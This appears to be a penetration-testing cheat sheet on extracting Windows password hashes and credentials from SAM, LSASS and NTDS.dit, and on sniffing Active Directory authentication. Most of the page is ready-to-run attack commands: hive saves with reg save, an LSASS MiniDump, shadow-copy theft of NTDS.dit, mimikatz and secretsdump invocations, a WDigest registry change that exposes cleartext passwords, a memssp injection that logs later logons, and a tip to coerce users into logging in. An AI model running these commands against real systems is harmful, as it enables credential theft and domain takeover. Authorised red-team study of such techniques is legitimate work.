Extract Hash & Password

Attacks that allow obtaining NTLM hashes of local users or Active Directory domain users.

Information

Database

SAM (Security Account Manager)

Hash format

LM (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total) NTLM (MD4)

Authentication protocols

NTLMv1 (uses LM and NTLM hashes) NTLMv2 (uses NTLM hashes) Kerberos

Process

LSASS (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc. Implements LSA (Local Security Authority).

NTDS.dit

Each Domain Controller in Active Directory keeps this database file synchronized, which contains a lot of information including usernames and password hashes (SAM is used only for logins on the device with local accounts)

SAM Hashes

To extract hashes from the SAM database we need:

Administrator Privileges
hklm\sam contains the password hashes.
hklm\system contains the bootkey needed to decrypt the SAM db.
hklm\security contains cached credentials for domain accounts.

(C:\\Windows\System32\Config\)

Create copies for transfer

reg.exe save hklm\sam C:\sam.save

reg.exe save hklm\system C:\system.save

reg.exe save hklm\security C:\security.save

Extracting hashes from the SAM database in offline mode by having the files. Use impacket-secretsdump.

secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL

LSASS Hashes

To extract hashes from the LSASS process we need:

Administrator Privileges
Dump of the running process

Create a copy for transfer

Task Manager > Right-click on LSAProcess > Create dump file

tasklist /svc or Get-Process lsass
# get PID LSASS

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dump full

Extracting hashes from the LSASS process dump in offline mode by having the files. For example, with administrator privileges, from the Task Manager, go to the “Details” tab, find lsass.exe, right-click, and select “Create dump file.”

Use pypykatz.

pypykatz lsa minidump lsass.dump

NTDS Hashes

To extract hashes from the NTDS.dit file we need::

Connect to a Domain Controller
Have Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights (or equivalent)
hklm\system contains the bootkey needed for decryption

Create a copy for transfer

vssadmin CREATE SHADOW /For=C:

vshadow.exe -nw -p C:
# get PATH

cmd.exe /c copy <PATH>\Windows\NTDS\NTDS.dit c:\NTDS.dit

Tools

Tool

Details

netexec

Remotly nxc smb <IP> [--local-auth] -u <USER> -p <PASS> --sam --lsa -M lsassy nxc smb <IP_DC> -u <USER> -p <PASS> --ntds

mimikatz

On Host (need SeDebugPrivilege active, in addition to administrator privileges)

.\mimikatz.exe

> privilege::debug -> token::elevate > lsadump::sam > lsadump::lsa > lsadump::secrets > vault::cred > sekurlsa::credman > sekurlsa::logonpasswords full (see UseLogonCredential Registry Key )

Guide HERE and for all moduls see HERE. For Meterpreter RevShell: load kiwie No-interactive shell: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

impacket-secretsdump

secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>

HiveNightmare

Create a copy of the SAM files, System, Security from any user even unprivileged. CVE-2021-36934 - SeriousSam .\HiveNightmare.exe

Sniffing

Tool

Details

responder

Linux sudo responder -I <INTERFACE> sudo responder -I <INTERFACE> -A (passive analysis mode) See /usr/share/responder/logs

Inveigh

Windows PowerShell version (no longer maintained) Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput YC# version .\Inveigh.exe [ESC] > HELP

rubeus

Windows (sniff TGT and TGS, usefull on services account) Requires elevated privileges Rubeus.exe monitor /interval:1 /nowrap Save output in file "ticket.bs4.kirbi" then cat ticket.bs4.kirbi | base64 -d > ticket.kirbi

ticketConverter.py ticket.kirbi user.ccache

If we have access to the target we can use net use \<IP_Attacker>\share

Other

UseLogonCredential Registry Key

We need to enable that Registry Key UseLogonCredential to be able to extract Clear Password

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

And reboot

shutdown /r /t 0 /f

Store Password using Reversible Encryption

When this option is set on a user account, the passwords are stored using RC4 encryption with the key stored in the registry (the Syskey) that can be extracted by a Domain Admin or equivalent. Tools such as impacket-secretsdump.py will decrypt any passwords stored using reversible encryption while dumping the NTDS file either as a Domain Admin or using an attack such as DCSync.

Enumeration

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

With PowerView (Old and New)

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Credential Guard

When enabled, the Local Security Authority (LSASS) environment runs as a trustlet in VTL1 (VSM Secure Mode) named LSAISO.exe (LSA Isolated) and communicates with the LSASS.exe process running in VTL0 (VSM Normal Mode) through an RCP channel. This means that the data is encrypted.

Credential Guard is only designed to protect non-local users.

Get-ComputerInfo
# CredentialGuard in DeviceGuardSecurityServicesConfigured DeviceGuardSecurityServicesRunning

With mimikatz

privilege::debug
misc::memssp
# OUTPUT IN C:\Windows\System32\mimilsa.log

Now we can be patient and wait for another user to remotely connect to the machine or we can resort to additional techniques such as social engineering to coerce someone to log in.

Last updated 11 days ago

hashtagInformation

hashtagSAM Hashes

hashtagLSASS Hashes

hashtagNTDS Hashes

hashtagTools

hashtagSniffing

hashtagOther

hashtagUseLogonCredential Registry Key

hashtagStore Password using Reversible Encryption

hashtagCredential Guardarrow-up-right